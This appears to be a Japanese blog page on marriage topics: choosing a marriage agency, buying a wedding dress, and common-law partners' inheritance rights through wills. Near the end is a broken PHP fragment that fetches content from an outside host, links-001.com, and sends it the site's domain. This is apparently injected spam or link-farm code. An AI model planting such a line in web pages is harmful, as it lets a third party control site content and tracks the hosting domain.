前へ
次へ

満足度の高い結婚相談所の選び方

真剣に結婚相手を探したいのであれば、やはり利用したいのが結婚相談所です。
最近では婚活需要が高

more

結婚が決まったらウェディングドレスを購入しよう

今の時代は、ウェディングドレスを販売している業者と、すぐに連絡をとることができるようになりました。<

more

結婚相手に求める条件の設定は重要

ここ最近有名人の結婚騒動が巷を賑わせていますが、そこで庶民が注目するのが結婚相手に求める条件の線引き

more

結婚をしていないと相続できないか

家族が亡くなったときは相続があり、配偶者は自然に法定相続人になります。
配偶者に対しては相続税上もそれなりに優遇措置があるので、かなりの相続を受けたとしても相続税がかからないようになっています。
配偶者の関係を持つには結婚をする必要があるので、事実婚状態の人は注意が必要です。
事実婚は表向きは結婚している者同士のように生活をしているものの、婚姻届けを出すなど法律上の婚姻関係にない状態を指します。
事実婚でもいろいろなケースにおいては実際に結婚しているのと同様に扱ってくれることもありますが、相続に関しては配偶者とみなしてくれません。
では事実婚の相手に自分の資産を相続できないかですが、一応遺言を作成することで残すことはできます。
遺産相続においては遺言書が最優先されるので、すべての資産を事実婚の相手に残すと書くこともできます。
ただし遺留分があるために子供や親がいるときには一定の資産を分けないといけないときもあります。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top